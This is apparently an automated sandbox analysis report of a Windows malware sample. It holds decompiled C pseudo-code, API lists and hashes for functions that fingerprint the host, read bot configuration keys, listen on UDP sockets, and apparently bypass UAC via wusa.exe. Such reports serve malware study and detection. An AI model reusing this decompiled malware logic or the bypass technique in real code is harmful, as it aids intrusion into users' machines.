                                                                                                                                  • Opcode Fuzzy Hash: efd62ad2f798959cafcb8abb2af2c905d2a72a8beefa2774c48dbd7e0eb95f79
                                                                                                                                  • Instruction Fuzzy Hash: DAC1D2B1D00109BEEB11ABA0DE85EEF7BBCEB04304F14447FF544B2191EA794E948B69
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 004151F7 Relevance: 33.6, APIs: 18, Strings: 1, Instructions: 382COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284699476.0000000000415000.00000020.00000001.01000000.00000004.sdmp, Offset: 00415000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_415000_pjzcupje.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ___check_float_string$__inc$_isdigit$__filbuf
                                                                                                                                  • String ID: +
                                                                                                                                  • API String ID: 2300710676-2126386893
                                                                                                                                  • Opcode ID: ad1f5bb9c355918d75b7c057bde0c440c9cfce169a1ae502d87da89f97f783a0
                                                                                                                                  • Instruction ID: 3027c3f7f7f7b209974f4d897e9ad327b7b2965923b83da4b714fa7d9bf2a412
                                                                                                                                  • Opcode Fuzzy Hash: ad1f5bb9c355918d75b7c057bde0c440c9cfce169a1ae502d87da89f97f783a0
                                                                                                                                  • Instruction Fuzzy Hash: 44F172B5D00659DBCF14DFA9CC90AEEBB75BF84304F14829AD81A67302D739AA80CF55
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00401D96 Relevance: 31.7, APIs: 6, Strings: 12, Instructions: 205libraryloaderCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 95%
                                                                                                                                  			E00401D96(void* __ecx, intOrPtr* _a4) {
				struct _OSVERSIONINFOA _v156;
				struct _SYSTEM_INFO _v192;
				char _v196;
				intOrPtr _v200;
				intOrPtr _t59;
				signed int _t61;
				signed int _t63;
				void* _t65;
				intOrPtr _t66;
				intOrPtr _t67;
				signed int _t71;
				intOrPtr _t93;
				intOrPtr _t96;
				intOrPtr _t97;
				intOrPtr _t102;
				intOrPtr* _t103;
				intOrPtr* _t105;
				void* _t109;
				void* _t110;
				void* _t111;
				void* _t112;
				void* _t113;
				void* _t114;

				_t105 = _a4;
				_t102 = 0x64;
				E0040EE2A(__ecx, _t105, 0, _t102);
				_t109 =  &_v200 + 0xc;
				 *_t105 = _t102;
				_v156.dwOSVersionInfoSize = 0x9c;
				if(GetVersionExA( &_v156) == 0) {
					 *((char*)(_t105 + 0x41)) = 0;
				} else {
					 *((char*)(_t105 + 0x41)) = (_v156.dwMajorVersion << 4) + _v156.dwMinorVersion;
				}
				GetSystemInfo( &_v192);
				 *((char*)(_t105 + 0x3f)) = _v192.dwNumberOfProcessors;
				_v196 = 0;
				_t103 = GetProcAddress(GetModuleHandleA("kernel32"), "IsWow64Process");
				if(_t103 != 0) {
					 *_t103(GetCurrentProcess(),  &_v196);
				}
				_t104 = "localcfg";
				 *((char*)(_t105 + 0x40)) = 2;
				_t59 = E0040E819(1, "localcfg", "lid_file_upd", 0);
				_t92 = "flags_upd";
				 *((intOrPtr*)(_t105 + 0x24)) = _t59;
				 *(_t105 + 4) =  *(_t105 + 4) | E0040E819(1, "localcfg", "flags_upd", 0);
				_t61 =  *(_t105 + 4);
				_t110 = _t109 + 0x20;
				if((_t61 & 0x00000008) != 0) {
					 *(_t105 + 4) = _t61 & 0xfffffff7;
					E0040DF70(1, "work_srv");
					E0040DF70(1, "start_srv");
					_t110 = _t110 + 0x10;
				}
				E0040EA84(1, _t104, _t92, 0);
				_t93 = 0;
				_t63 = E0040E819(1, _t104, "net_type", 0);
				_t111 = _t110 + 0x20;
				 *(_t105 + 0x14) = _t63;
				if(E0040199C(_t63) == 0) {
					 *(_t105 + 0x14) =  *(_t105 + 0x14) | 0x00000010;
				} else {
					 *(_t105 + 0x14) =  *(_t105 + 0x14) | 0x00000020;
				}
				_t65 = E0040E819(1, _t104, "born_date", _t93);
				_t112 = _t111 + 0x10;
				 *((intOrPtr*)(_t105 + 0x30)) = _t93;
				if(_t65 == _t93) {
					_t97 = E0040F04E(_t93);
					E0040EA84(1, _t104, "born_date", _t97);
					_t112 = _t112 + 0x14;
					 *((intOrPtr*)(_t105 + 0x30)) = _t97;
					_t93 = 0;
				}
				_t94 = "id";
				_t66 = E0040E819(1, _t104, "id", _t93);
				_t113 = _t112 + 0x10;
				 *((intOrPtr*)(_t105 + 0xc)) = _t66;
				if(_t66 == 0) {
					_v200 = E00401B71();
					E0040EA84(1, _t104, _t94, _t77);
					_t113 = _t113 + 0x10;
					 *((intOrPtr*)(_t105 + 0xc)) = _v200;
				}
				_t95 = "hi_id";
				_t67 = E0040E819(1, _t104, "hi_id", 0);
				_t114 = _t113 + 0x10;
				 *((intOrPtr*)(_t105 + 0x10)) = _t67;
				if(_t67 == 0) {
					_v200 = E00401BDF();
					E0040EA84(1, _t104, _t95, _t74);
					_t114 = _t114 + 0x10;
					 *((intOrPtr*)(_t105 + 0x10)) = _v200;
				}
				 *((intOrPtr*)(_t105 + 8)) = 0x5e;
				_t96 = E0040E819(1, _t104, "loader_id", 0);
				if(_t96 == 0) {
					_t96 = 0xd;
					E0040EA84(1, _t104, "loader_id", _t96);
				}
				 *((intOrPtr*)(_t105 + 0x1c)) = _t96;
				 *((intOrPtr*)(_t105 + 0x34)) = E004030B5();
				if( *0x41201d == 0) {
					if( *0x41201f == 0) {
						 *(_t105 + 0x18) =  *(_t105 + 0x18) & 0x00000000;
					} else {
						if(E00406EC3() != 0) {
							 *(_t105 + 0x18) = 2;
						} else {
							 *(_t105 + 0x18) = 0x10;
						}
					}
				} else {
					 *(_t105 + 0x18) = 1;
				}
				if(_v196 != 0) {
					 *(_t105 + 0x18) =  *(_t105 + 0x18) | 0x00000200;
				}
				_t71 = GetTickCount() / 0x3e8;
				 *0x412110 = _t71;
				 *(_t105 + 0x28) = _t71;
				return _t71;
			}


























                                                                                                                                  0x00401d9f
                                                                                                                                  0x00401da9
                                                                                                                                  0x00401daf
                                                                                                                                  0x00401db4
                                                                                                                                  0x00401dbc
                                                                                                                                  0x00401dbe
                                                                                                                                  0x00401dce
                                                                                                                                  0x00401de0
                                                                                                                                  0x00401dd0
                                                                                                                                  0x00401ddb
                                                                                                                                  0x00401ddb
                                                                                                                                  0x00401de8
                                                                                                                                  0x00401dfc
                                                                                                                                  0x00401dff
                                                                                                                                  0x00401e10
                                                                                                                                  0x00401e14
                                                                                                                                  0x00401e22
                                                                                                                                  0x00401e22
                                                                                                                                  0x00401e2a
                                                                                                                                  0x00401e34
                                                                                                                                  0x00401e38
                                                                                                                                  0x00401e3e
                                                                                                                                  0x00401e46
                                                                                                                                  0x00401e4e
                                                                                                                                  0x00401e51
                                                                                                                                  0x00401e54
                                                                                                                                  0x00401e59
                                                                                                                                  0x00401e64
                                                                                                                                  0x00401e67
                                                                                                                                  0x00401e72
                                                                                                                                  0x00401e77
                                                                                                                                  0x00401e77
                                                                                                                                  0x00401e7f
                                                                                                                                  0x00401e84
                                                                                                                                  0x00401e8e
                                                                                                                                  0x00401e93
                                                                                                                                  0x00401e96
                                                                                                                                  0x00401ea0
                                                                                                                                  0x00401ea8
                                                                                                                                  0x00401ea2
                                                                                                                                  0x00401ea2
                                                                                                                                  0x00401ea2
                                                                                                                                  0x00401eb4
                                                                                                                                  0x00401eb9
                                                                                                                                  0x00401ebc
                                                                                                                                  0x00401ec1
                                                                                                                                  0x00401ec9
                                                                                                                                  0x00401ed3
                                                                                                                                  0x00401ed8
                                                                                                                                  0x00401edb
                                                                                                                                  0x00401ede
                                                                                                                                  0x00401ede
                                                                                                                                  0x00401ee1
                                                                                                                                  0x00401ee9
                                                                                                                                  0x00401eee
                                                                                                                                  0x00401ef1
                                                                                                                                  0x00401ef6
                                                                                                                                  0x00401f01
                                                                                                                                  0x00401f05
                                                                                                                                  0x00401f0e
                                                                                                                                  0x00401f11
                                                                                                                                  0x00401f11
                                                                                                                                  0x00401f16
                                                                                                                                  0x00401f1e
                                                                                                                                  0x00401f23
                                                                                                                                  0x00401f26
                                                                                                                                  0x00401f2b
                                                                                                                                  0x00401f36
                                                                                                                                  0x00401f3a
                                                                                                                                  0x00401f43
                                                                                                                                  0x00401f46
                                                                                                                                  0x00401f46
                                                                                                                                  0x00401f52
                                                                                                                                  0x00401f5e
                                                                                                                                  0x00401f65
                                                                                                                                  0x00401f69
                                                                                                                                  0x00401f72
                                                                                                                                  0x00401f77
                                                                                                                                  0x00401f7a
                                                                                                                                  0x00401f82
                                                                                                                                  0x00401f8c
                                                                                                                                  0x00401f9a
                                                                                                                                  0x00401fb7
                                                                                                                                  0x00401f9c
                                                                                                                                  0x00401fa3
                                                                                                                                  0x00401fae
                                                                                                                                  0x00401fa5
                                                                                                                                  0x00401fa5
                                                                                                                                  0x00401fa5
                                                                                                                                  0x00401fa3
                                                                                                                                  0x00401f8e
                                                                                                                                  0x00401f8e
                                                                                                                                  0x00401f8e
                                                                                                                                  0x00401fc0
                                                                                                                                  0x00401fc2
                                                                                                                                  0x00401fc2
                                                                                                                                  0x00401fd6
                                                                                                                                  0x00401fd9
                                                                                                                                  0x00401fde
                                                                                                                                  0x00401fea

                                                                                                                                  APIs
                                                                                                                                  • GetVersionExA.KERNEL32 ref: 00401DC6
                                                                                                                                  • GetSystemInfo.KERNEL32(?), ref: 00401DE8
                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process), ref: 00401E03
                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00401E0A
                                                                                                                                  • GetCurrentProcess.KERNEL32(?), ref: 00401E1B
                                                                                                                                  • GetTickCount.KERNEL32 ref: 00401FC9
                                                                                                                                    • Part of subcall function 00401BDF: GetComputerNameA.KERNEL32 ref: 00401C15
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressComputerCountCurrentHandleInfoModuleNameProcProcessSystemTickVersion
                                                                                                                                  • String ID: 0 v$IsWow64Process$born_date$flags_upd$hi_id$kernel32$lid_file_upd$loader_id$localcfg$net_type$start_srv$work_srv
                                                                                                                                  • API String ID: 4207808166-1853734742
                                                                                                                                  • Opcode ID: 857587d66ef5407bd9f823cee7786aca052e01b20ac6ebc7d69f7416010c46cb
                                                                                                                                  • Instruction ID: cd5e56fee8dacda117f2c3378b491c5a2df23dd5de729853a430aab3da097112
                                                                                                                                  • Opcode Fuzzy Hash: 857587d66ef5407bd9f823cee7786aca052e01b20ac6ebc7d69f7416010c46cb
                                                                                                                                  • Instruction Fuzzy Hash: 2551EA705043446FD330AF768C85F67BAECEB84708F00493FF955A2292D7BDA94487A9
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00401280 Relevance: 30.2, APIs: 9, Strings: 8, Instructions: 417stringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ShellExecuteExW.SHELL32(?), ref: 0040139A
                                                                                                                                  • lstrlenW.KERNEL32(-00000003), ref: 00401571
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExecuteShelllstrlen
                                                                                                                                  • String ID: $%systemroot%\system32\cmd.exe$<$@$D$uac$useless$wusa.exe
                                                                                                                                  • API String ID: 1628651668-1839596206
                                                                                                                                  • Opcode ID: ab4c75885172d034ed3803886c8c211ded8e4a09802339f18fb7352a61972d3c
                                                                                                                                  • Instruction ID: 915494465e6448ea0d8334ed2feda226c725056e28db06d0983f622db304c09c
                                                                                                                                  • Opcode Fuzzy Hash: ab4c75885172d034ed3803886c8c211ded8e4a09802339f18fb7352a61972d3c
                                                                                                                                  • Instruction Fuzzy Hash: E5F19FB55083419FD720DF64C888BABB7E5FB88304F10892EF596A73A0D778D944CB5A
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 0040199C Relevance: 29.9, APIs: 11, Strings: 6, Instructions: 106memorylibraryloaderCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 54%
                                                                                                                                  			E0040199C(void* __eax) {
				long _v8;
				_Unknown_base(*)()* _v12;
				struct HINSTANCE__* _v16;
				char _v20;
				void* _v24;
				long _v28;
				_Unknown_base(*)()* _t30;
				intOrPtr _t32;
				void* _t34;
				void* _t41;
				struct HINSTANCE__* _t48;
				_Unknown_base(*)()* _t49;
				void* _t50;

				_v20 = 0;
				_v28 = 0;
				__imp__#11("123.45.67.89");
				_v24 = __eax;
				_t48 = LoadLibraryA("Iphlpapi.dll");
				_v16 = _t48;
				if(_t48 != 0) {
					_v12 = GetProcAddress(_t48, "GetAdaptersInfo");
					_t49 = GetProcAddress(_t48, "GetIfEntry");
					_t30 = GetProcAddress(_v16, "GetBestInterface");
					if(_v12 == 0 || _t49 == 0 || _t30 == 0) {
						FreeLibrary(_v16);
						goto L21;
					} else {
						 *_t30(_v24,  &_v20);
						_t34 = GetProcessHeap();
						_v24 = _t34;
						if(_t34 == 0) {
							L21:
							_t32 = 0;
							L22:
							return _t32;
						}
						_t50 = HeapAlloc(_t34, 0, 0x288);
						if(_t50 == 0) {
							goto L21;
						}
						_push( &_v8);
						_push(_t50);
						_v8 = 0x288;
						if(_v12() == 0x6f) {
							_t50 = HeapReAlloc(_v24, 0, _t50, _v8);
						}
						if(_t50 == 0) {
							L18:
							FreeLibrary(_v16);
							if(_v28 == 0) {
								goto L21;
							}
							_t32 = 1;
							goto L22;
						} else {
							_push( &_v8);
							_push(_t50);
							if(_v12() != 0) {
								goto L18;
							}
							_t41 = _t50;
							while( *((intOrPtr*)(_t41 + 0x19c)) != _v20) {
								_t41 =  *_t41;
								if(_t41 != 0) {
									continue;
								}
								L17:
								HeapFree(_v24, 0, _t50);
								goto L18;
							}
							if( *((intOrPtr*)(_t41 + 0x1a0)) != 6) {
								_v28 = 1;
							}
							goto L17;
						}
					}
				}
				return 0;
			}
















                                                                                                                                  0x004019ab
                                                                                                                                  0x004019ae
                                                                                                                                  0x004019b1
                                                                                                                                  0x004019bc
                                                                                                                                  0x004019c5
                                                                                                                                  0x004019c7
                                                                                                                                  0x004019cc
                                                                                                                                  0x004019ea
                                                                                                                                  0x004019f7
                                                                                                                                  0x004019f9
                                                                                                                                  0x004019fe
                                                                                                                                  0x00401ab6
                                                                                                                                  0x00000000
                                                                                                                                  0x00401a14
                                                                                                                                  0x00401a1b
                                                                                                                                  0x00401a1d
                                                                                                                                  0x00401a23
                                                                                                                                  0x00401a28
                                                                                                                                  0x00401abc
                                                                                                                                  0x00401abc
                                                                                                                                  0x00401abe
                                                                                                                                  0x00000000
                                                                                                                                  0x00401abe
                                                                                                                                  0x00401a3c
                                                                                                                                  0x00401a40
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00401a45
                                                                                                                                  0x00401a46
                                                                                                                                  0x00401a47
                                                                                                                                  0x00401a50
                                                                                                                                  0x00401a60
                                                                                                                                  0x00401a60
                                                                                                                                  0x00401a67
                                                                                                                                  0x00401aa1
                                                                                                                                  0x00401aa4
                                                                                                                                  0x00401aad
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00401aaf
                                                                                                                                  0x00000000
                                                                                                                                  0x00401a69
                                                                                                                                  0x00401a6c
                                                                                                                                  0x00401a6d
                                                                                                                                  0x00401a73
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00401a75
                                                                                                                                  0x00401a77
                                                                                                                                  0x00401a82
                                                                                                                                  0x00401a86
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00401a96
                                                                                                                                  0x00401a9b
                                                                                                                                  0x00000000
                                                                                                                                  0x00401a9b
                                                                                                                                  0x00401a91
                                                                                                                                  0x00401a93
                                                                                                                                  0x00401a93
                                                                                                                                  0x00000000
                                                                                                                                  0x00401a91
                                                                                                                                  0x00401a67
                                                                                                                                  0x004019fe
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                  • inet_addr.WS2_32(123.45.67.89), ref: 004019B1
                                                                                                                                  • LoadLibraryA.KERNEL32(Iphlpapi.dll,?,?,?,?,00000001,00401E9E), ref: 004019BF
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 004019E2
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetIfEntry), ref: 004019ED
                                                                                                                                  • GetProcAddress.KERNEL32(?,GetBestInterface), ref: 004019F9
                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,?,?,00000001,00401E9E), ref: 00401A1D
                                                                                                                                  • HeapAlloc.KERNEL32(00000000,00000000,00000288,?,?,?,?,00000001,00401E9E), ref: 00401A36
                                                                                                                                  • HeapReAlloc.KERNEL32(?,00000000,00000000,00401E9E,?,?,?,?,00000001,00401E9E), ref: 00401A5A
                                                                                                                                  • HeapFree.KERNEL32(?,00000000,00000000,?,?,?,?,00000001,00401E9E), ref: 00401A9B
                                                                                                                                  • FreeLibrary.KERNEL32(?,?,?,?,?,00000001,00401E9E), ref: 00401AA4
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$AddressProc$AllocFreeLibrary$LoadProcessinet_addr
                                                                                                                                  • String ID: 123.45.67.89$GetAdaptersInfo$GetBestInterface$GetIfEntry$Iphlpapi.dll$localcfg
                                                                                                                                  • API String ID: 835516345-270533642
                                                                                                                                  • Opcode ID: 52436911476c130446cd143f44c65522dc478156bb7ce270366fd521237d2269
                                                                                                                                  • Instruction ID: c689a3d9ae3379b0bfe51822f68a21815d588b76a9689f39126eb657c90dfffc
                                                                                                                                  • Opcode Fuzzy Hash: 52436911476c130446cd143f44c65522dc478156bb7ce270366fd521237d2269
                                                                                                                                  • Instruction Fuzzy Hash: 39313E32A01219AFCF119FE4DD888AFBBB9EB45311B24457BE501B2260D7B94E819F58
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00402A62 Relevance: 27.2, APIs: 18, Instructions: 194networkmemoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 53%
                                                                                                                                  			E00402A62(void* __ecx, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr* _v44;
				signed short _v272;
				char _v276;
				long _v280;
				char _v284;
				signed short _v288;
				signed short _v292;
				long _v300;
				long _v304;
				intOrPtr _v308;
				signed short _v324;
				intOrPtr _v332;
				signed short _v336;
				signed int _v340;
				signed int _v344;
				void* _v348;
				signed short _v352;
				signed short _v356;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t53;
				signed short _t66;
				void** _t71;
				void* _t76;
				void* _t77;
				void* _t78;
				signed short _t79;
				intOrPtr* _t81;
				signed short _t82;
				signed short _t83;
				intOrPtr _t86;
				signed int _t88;
				void* _t90;
				long _t91;
				signed short _t92;
				void* _t94;

				_t77 = __ecx;
				_t91 = 0;
				 *_a12 = 1;
				_t50 = HeapAlloc(GetProcessHeap(), 0, 0x1000);
				_t76 = _t50;
				if(_t76 != 0) {
					__imp__#23(2, 2, 0x11, _t78);
					_t79 = _t50;
					_v288 = _t79;
					if(_t79 == 0 || _t79 == 0xffffffff) {
						HeapFree(GetProcessHeap(), _t91, _t76);
						_t53 = 0;
						goto L37;
					} else {
						_v304 = 0;
						while(1) {
							_v300 = _t91;
							if(_v304 != _t91) {
								_push(_t91);
							} else {
								_push(0x100);
							}
							__imp__#9();
							_t50 = E004026FF(_v8, _t79, _v12, _t50 & 0x0000ffff);
							_t94 = _t94 + 0xc;
							if(_t50 != 0) {
								goto L32;
							}
							_t86 = 0xc;
							_t50 =  &_v276;
							_v272 = _t79;
							_v276 = 1;
							_v284 = _t86;
							_v280 = _t91;
							__imp__#18(_t91, _t50, _t91, _t91,  &_v284);
							if(_t50 <= 0) {
								goto L32;
							}
							_t50 = E0040EE2A(_t77, _t76, _t91, 4);
							_t94 = _t94 + 0xc;
							__imp__#16(_t79, _t76, 0x1000, _t91);
							_t92 = _t50;
							_v324 = _t92;
							if(_t92 > 0 && _t92 > _t86) {
								_t81 = __imp__#15;
								_t88 =  *_t81( *(_t76 + 2) & 0x0000ffff) & 0xf;
								if(_t88 == 3) {
									L34:
									 *_v44 = 2;
									L35:
									HeapFree(GetProcessHeap(), 0, _t76);
									__imp__#3(_v292);
									_t53 = _v308;
									L37:
									return _t53;
								}
								if(_t88 != 2) {
									L16:
									if(_t88 != 0) {
										goto L32;
									}
									_t50 = E00402923(_t77, _t76, _t92);
									_pop(_t77);
									_v336 = _t50;
									if(_t50 == 0) {
										goto L32;
									}
									_v340 = _v340 & 0x00000000;
									_v344 = _v344 & 0x00000000;
									_t82 = _t50;
									_v352 = _t82;
									L20:
									while(1) {
										if( *((short*)(_t82 + 0x10a)) != 1 ||  *((short*)(_t82 + 0x108)) != 0xf ||  *((short*)(_t82 + 0x10c)) < 3) {
											L30:
											_t83 =  *_t82;
											_v352 = _t83;
											if(_t83 != 0) {
												_t82 = _v352;
												continue;
											}
											goto L31;
										} else {
											_t90 = HeapAlloc(GetProcessHeap(), 0, 0x108);
											if(_t90 == 0) {
												L31:
												_t50 = E00402904(_v336);
												if(_v344 != 0) {
													goto L35;
												}
												goto L32;
											}
											E0040EE2A(_t77, _t90, 0, 0x108);
											_t66 =  *( *((intOrPtr*)(_t82 + 0x110)) + _t76) & 0x0000ffff;
											_t94 = _t94 + 0xc;
											__imp__#15();
											 *(_t90 + 4) = _t66 & 0x0000ffff;
											_t33 = _t90 + 8; // 0x8
											E00402871( *((intOrPtr*)(_t82 + 0x110)) + 2, _t76, _t77, _t33, _v332);
											_t77 = _t66;
											if( *((char*)(_t90 + 8)) != 0) {
												_t71 = _v344;
												_v344 = _t90;
												if(_t71 != 0) {
													 *_t71 = _t90;
												} else {
													_v348 = _t90;
												}
											} else {
												HeapFree(GetProcessHeap(), 0, _t90);
											}
											_t82 = _v356;
											goto L30;
										}
									}
								}
								_push( *(_t76 + 2) & 0x0000ffff);
								if( *_t81() < 0) {
									goto L34;
								}
								goto L16;
							}
							L32:
							_v308 = _v308 + 1;
							if(_v308 < 2) {
								_t79 = _v292;
								_t91 = 0;
								continue;
							}
							goto L35;
						}
					}
				}
				return 0;
			}










































                                                                                                                                  0x00402a62
                                                                                                                                  0x00402a7a
                                                                                                                                  0x00402a7d
                                                                                                                                  0x00402a86
                                                                                                                                  0x00402a8c
                                                                                                                                  0x00402a90
                                                                                                                                  0x00402aa0
                                                                                                                                  0x00402aa6
                                                                                                                                  0x00402aa8
                                                                                                                                  0x00402aae
                                                                                                                                  0x00402cd8
                                                                                                                                  0x00402cde
                                                                                                                                  0x00000000
                                                                                                                                  0x00402abd
                                                                                                                                  0x00402abd
                                                                                                                                  0x00402ac9
                                                                                                                                  0x00402ac9
                                                                                                                                  0x00402ad1
                                                                                                                                  0x00402ada
                                                                                                                                  0x00402ad3
                                                                                                                                  0x00402ad3
                                                                                                                                  0x00402ad3
                                                                                                                                  0x00402adb
                                                                                                                                  0x00402af4
                                                                                                                                  0x00402af9
                                                                                                                                  0x00402afe
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00402b06
                                                                                                                                  0x00402b0e
                                                                                                                                  0x00402b14
                                                                                                                                  0x00402b18
                                                                                                                                  0x00402b20
                                                                                                                                  0x00402b24
                                                                                                                                  0x00402b28
                                                                                                                                  0x00402b30
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00402b3a
                                                                                                                                  0x00402b3f
                                                                                                                                  0x00402b4a
                                                                                                                                  0x00402b50
                                                                                                                                  0x00402b52
                                                                                                                                  0x00402b58
                                                                                                                                  0x00402b6a
                                                                                                                                  0x00402b76
                                                                                                                                  0x00402b7c
                                                                                                                                  0x00402ca6
                                                                                                                                  0x00402cad
                                                                                                                                  0x00402cb3
                                                                                                                                  0x00402cbd
                                                                                                                                  0x00402cc7
                                                                                                                                  0x00402ccd
                                                                                                                                  0x00402ce0
                                                                                                                                  0x00000000
                                                                                                                                  0x00402ce0
                                                                                                                                  0x00402b85
                                                                                                                                  0x00402b96
                                                                                                                                  0x00402b98
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00402ba1
                                                                                                                                  0x00402ba6
                                                                                                                                  0x00402ba7
                                                                                                                                  0x00402bad
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00402bb3
                                                                                                                                  0x00402bb8
                                                                                                                                  0x00402bbd
                                                                                                                                  0x00402bbf
                                                                                                                                  0x00000000
                                                                                                                                  0x00402bc9
                                                                                                                                  0x00402bd1
                                                                                                                                  0x00402c77
                                                                                                                                  0x00402c77
                                                                                                                                  0x00402c79
                                                                                                                                  0x00402c7f
                                                                                                                                  0x00402bc5
                                                                                                                                  0x00000000
                                                                                                                                  0x00402bc5
                                                                                                                                  0x00000000
                                                                                                                                  0x00402bf3
                                                                                                                                  0x00402c08
                                                                                                                                  0x00402c0c
                                                                                                                                  0x00402c85
                                                                                                                                  0x00402c89
                                                                                                                                  0x00402c93
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00402c93
                                                                                                                                  0x00402c12
                                                                                                                                  0x00402c1d
                                                                                                                                  0x00402c21
                                                                                                                                  0x00402c25
                                                                                                                                  0x00402c32
                                                                                                                                  0x00402c3e
                                                                                                                                  0x00402c41
                                                                                                                                  0x00402c4a
                                                                                                                                  0x00402c4b
                                                                                                                                  0x00402c5f
                                                                                                                                  0x00402c63
                                                                                                                                  0x00402c69
                                                                                                                                  0x00402c71
                                                                                                                                  0x00402c6b
                                                                                                                                  0x00402c6b
                                                                                                                                  0x00402c6b
                                                                                                                                  0x00402c4d
                                                                                                                                  0x00402c57
                                                                                                                                  0x00402c57
                                                                                                                                  0x00402c73
                                                                                                                                  0x00000000
                                                                                                                                  0x00402c73
                                                                                                                                  0x00402bd1
                                                                                                                                  0x00402bc9
                                                                                                                                  0x00402b8b
                                                                                                                                  0x00402b90
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00402b90
                                                                                                                                  0x00402c95
                                                                                                                                  0x00402c95
                                                                                                                                  0x00402c9e
                                                                                                                                  0x00402ac3
                                                                                                                                  0x00402ac7
                                                                                                                                  0x00000000
                                                                                                                                  0x00402ac7
                                                                                                                                  0x00000000
                                                                                                                                  0x00402ca4
                                                                                                                                  0x00402ac9
                                                                                                                                  0x00402aae
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00001000,00000000,?,761B4F20), ref: 00402A83
                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,761B4F20), ref: 00402A86
                                                                                                                                  • socket.WS2_32(00000002,00000002,00000011), ref: 00402AA0
                                                                                                                                  • htons.WS2_32(00000000), ref: 00402ADB
                                                                                                                                  • select.WS2_32 ref: 00402B28
                                                                                                                                  • recv.WS2_32(?,00000000,00001000,00000000), ref: 00402B4A
                                                                                                                                  • htons.WS2_32(?), ref: 00402B71
                                                                                                                                  • htons.WS2_32(?), ref: 00402B8C
                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000108), ref: 00402BFB
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heaphtons$Process$Allocrecvselectsocket
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1639031587-0
                                                                                                                                  • Opcode ID: 72f5f8f4b8a6e38625c08c3a78b0cfce54e590fe4137906a5456ad4f28646144
                                                                                                                                  • Instruction ID: 51c4a8f8372388146ce05ee3fd67d3b8acfed2692fca977a8adbfce498b2b585
                                                                                                                                  • Opcode Fuzzy Hash: 72f5f8f4b8a6e38625c08c3a78b0cfce54e590fe4137906a5456ad4f28646144
                                                                                                                                  • Instruction Fuzzy Hash: FB61D271508305ABD7209F51DE0CB6FBBE8FB48345F14482AF945A72D1D7F8D8808BAA
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

